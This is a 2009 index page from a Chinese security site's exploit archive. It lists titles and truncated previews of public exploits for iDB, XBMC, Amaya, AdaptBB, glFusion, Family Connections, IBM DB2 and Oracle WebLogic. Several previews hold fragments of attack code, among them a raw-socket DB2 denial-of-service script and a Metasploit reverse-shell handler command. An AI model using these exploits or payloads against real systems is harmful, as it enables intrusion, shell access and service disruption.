首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
iDB 0.2.5pa SVN 243 (skin) Local File Inclusion Exploit
  日期:2009-04-07 10:46:53 点击:103 评论:0
#!/usr/bin/env # LOTFREE 2009 - lotfree.next-touch.com # Local require() vulnerability in iDB (a PHP/MySQL BBS) # Test on version 0.2.5 Pre-Alpha SVN 243 (released March 30, 2009) # # No checks are made on var skin in inc/profilemain.php before savin
Mozilla Firefox XSL Parsing Remote Memory Corruption PoC #2
  日期:2009-04-07 10:46:16 点击:33 评论:0
------------- by DATA_SNIPER GREETZ TO THE FOUNDER ;) fore more information and bug analyses: http://www.at4re.com/f/showthread.php?p=47560 i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000] so i can
XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)
  日期:2009-04-07 10:44:44 点击:49 评论:0
#!/usr/bin/env python ''' Xbmc get request remote buffer overflow 8.10 *seh*(Universal address)!! Tested:Win xp sp2 eng Win vista sp1 Vendor url:http://xbmc.org/ Release date:April the 4th 2009 versions affected: windows all versions. I had tried awh
Amaya 11.1 XHTML Parser Remote Buffer Overflow PoC
  日期:2009-04-07 10:43:07 点击:36 评论:0
#=cicatriz c1c4tr1z@voodoo-labs.org=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=# /) /) /) _ _ _______(/ ________ // _ (/_ _ _____ _ (/__(_)(_)(_(_(_)(_) (/_(_(_/_) /_)_ o (_)/ (_(_/_ .-/ #=Amaya 11.1 XHTML Parser Buffer Ov
AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit
  日期:2009-04-07 10:42:17 点击:40 评论:0
#!/usr/bin/perl -w # # AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit # # Description # ----------- # AdaptBB contains a flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the inc/bb/topic
Family Connections <= 1.8.2 Remote Shell Upload Exploit
  日期:2009-04-07 10:41:33 点击:6494 评论:0
/* Family Connections = 1.8.2 - Remote Shell Upload Exploit Author: Salvatore drosophila Fresta Contact: drosophilaxxx@gmail.com Date: 3 April 2009 The following software will upload a simple php shell. To execute remote commands, you must open the
glFusion <= 1.1.2 COM_applyFilter()/cookies Blind SQL Injection Exploit
  日期:2009-04-07 10:40:28 点击:110 评论:0
?php /* glFusion = 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit by Nine:Situations:Group::bookoo our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: Page created in seconds by glFusion
IBM DB2 < 9.5 pack 3a Malicious Data Stream Denial of Service Exploit
  日期:2009-04-07 10:39:39 点击:45 评论:0
# Discovered by Dennis Yurichev dennis@conus.info # DB2TEST database should be present on target system # GUEST account with QQ password shoule be present on target system from sys import * from socket import * sockobj = socket(AF_INET, SOCK_STREAM)
IBM DB2 < 9.5 pack 3a Malicious Connect Denial of Service Exploit
  日期:2009-04-07 10:38:58 点击:39 评论:0
# Discovered by Dennis Yurichev dennis@conus.info # DB2TEST database should be present on target system from sys import * from socket import * sockobj = socket(AF_INET, SOCK_STREAM) sockobj.connect ((argv[1], 50000)) sockobj.send( x00xBExD0x41x
IBM DB2 versions 9.5 prior to Fix Pack 3a denial of service exploit
  日期:2009-04-03 11:47:32 点击:36 评论:0
# Discovered by Dennis Yurichev dennis@conus.info# DB2TEST database should be present on target system# GUEST account with QQ password shoule be present on target systemfrom sys import *from socket import *sockobj = socket(AF_INET, SOCK_STREAM)socko
IBM DB2 versions 9.5 prior to Fix Pack 3a pre-auth denial of service exploit
  日期:2009-04-03 11:45:31 点击:52 评论:0
# Discovered by Dennis Yurichev dennis@conus.info# DB2TEST database should be present on target systemfrom sys import *from socket import *sockobj = socket(AF_INET, SOCK_STREAM)sockobj.connect ((argv[1], 50000))sockobj.send(x00xBExD0x41x00x01
SAP BusinessObjects Crystal Reports suffers from multiple cross site scripting v
  日期:2009-04-03 11:45:31 点击:81 评论:0
- SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS- DescriptionCross-site scripting; vbscript rather than javascript. Subsequent pagewill contain pop up reading fsck_cissp. ID, PROMPTEX-SESSION_ID,PROMPTEX-TO_DATE, PROMPTEX-
Amaya version 11.1 suffers from a XHTML parser buffer overflow vulnerability
  日期:2009-04-03 11:44:56 点击:42 评论:0
#=cicatriz c1c4tr1z@voodoo-labs.org=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=# /) /) /) _ _ _______(/ ________ // _ (/_ _ _____ _ (/__(_)(_)(_(_(_)(_) (/_(_(_/_) /_)_ o (_)/ (_(_/_ .-/ #=Amaya 11.1 XHTML Parser Buffer O
QtWeb Internet Browser version 2.0 remote denial of service exploit
  日期:2009-04-02 10:44:45 点击:67 评论:0
##################################################################################### QtWeb Internet Browser 2.0 (build 043) Remote Denial of Service Exploit (smile)## Summary: QtWeb is compact, portable and secure web browser having some unique UI#
XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit
  日期:2009-04-02 10:42:05 点击:43 评论:0
#!/usr/bin/env python ''' Xbmc get tag from file name request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ versions affected: Linux windows tested other versions are also possibly affected. Release date:April the
XBMC 8.10 (takescreenshot) Remote Buffer Overflow Exploit
  日期:2009-04-02 10:36:04 点击:40 评论:0
#!/usr/bin/env python ''' Xbmc takescreenshot request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ Release date:April the 1st 2009 versions affected: Linux windows tested other versions are also possibly affected.
XBMC 8.10 (Get Request) Remote Buffer Overflow Exploit (win)
  日期:2009-04-02 10:32:45 点击:44 评论:0
#!/usr/bin/env python ''' Xbmc get request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ Release date:April the 1st 2009 versions affected: Linux windows tested other versions are also possibly affected. Restrictio
XBMC 8.10 (Get Request) Remote Buffer Overflow Exploit (win)
  日期:2009-04-02 10:32:45 点击:43 评论:0
#!/usr/bin/env python ''' Xbmc get request remote buffer overflow 8.10 !!! Tested:Win xp sp2 eng Vendor url:http://xbmc.org/ Release date:April the 1st 2009 versions affected: Linux windows tested other versions are also possibly affected. Restrictio
XBMC 8.10 (GET Requests) Multiple Remote Buffer Overflow PoC
  日期:2009-04-02 10:29:39 点击:67 评论:0
/* XBMC multiple remote buffer overflow vulnerabilities. XBMC is an award winning media center application for Linux, Mac OS X, Windows and XBox. The ultimate hub for all your media, XBMC is easy to use, looks slick, and has a large helpful community
Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit
  日期:2009-04-02 10:28:40 点击:67 评论:0
#!/usr/bin/perl # No point in keeping this private anymore! # # k`sOSe - 02/16/2009 - CVE-2008-5457 # Tested on w2k sp4 and w2k3 R2 sp2 (no NX) # # cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST
共637页/12733条记录 首页 上一页 [465] [466] [467] 468 [469] [470] [471] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved